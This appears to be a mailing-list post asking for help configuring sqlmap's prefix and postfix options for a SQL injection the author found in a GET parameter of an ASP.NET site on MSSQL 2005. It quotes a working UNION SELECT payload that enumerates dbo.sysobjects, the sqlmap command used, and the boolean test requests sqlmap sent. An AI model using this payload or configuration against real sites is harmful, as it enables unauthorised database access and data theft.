Greetings,
I have been manually testing a site built with ASP.NET running MSSQL Server
2005 and identified a GET parameter vulnerable to injection. The site
returns *Microsoft OLE DB Provider for ODBC Drivers error '80040e14'*through
*[Microsoft][SQL Server Native Client 10.0][SQL Server]* for illegal
queries. The query is a little awkward and I'm having a hard time with
specifying * --prefix* and *--postfix* correctly to use sqlmap for this
injection.
my valid injection: http:// www.thesite.com/page.asp?p1=string*)')* union
select 1,name COLLATE Latin1_General_CI_AS,3,4,5,6,7 from dbo.sysobjects *--
*
The 2nd column is the only one to return output.
This is what I did with sqlmap:
./sqlmap --url www.thesite.com/page.asp?p1=string -p p1 --prefix \)\'\)
--postfix "--"
While testing my custom query, sqlmap does the following:
GET /page.asp?p1=string)') AND 967=967 -- HTTP/1.1
GET /page.asp?p1=string)') AND 967=968 -- HTTP/1.1
The query selects the options into a <select> field. Both requests are 200
OK, while both fail to select anything into the <select> field. Thus, sqlmap
directly moves on to the predefined tests.
Any suggestions?
Kerem Gunes
|
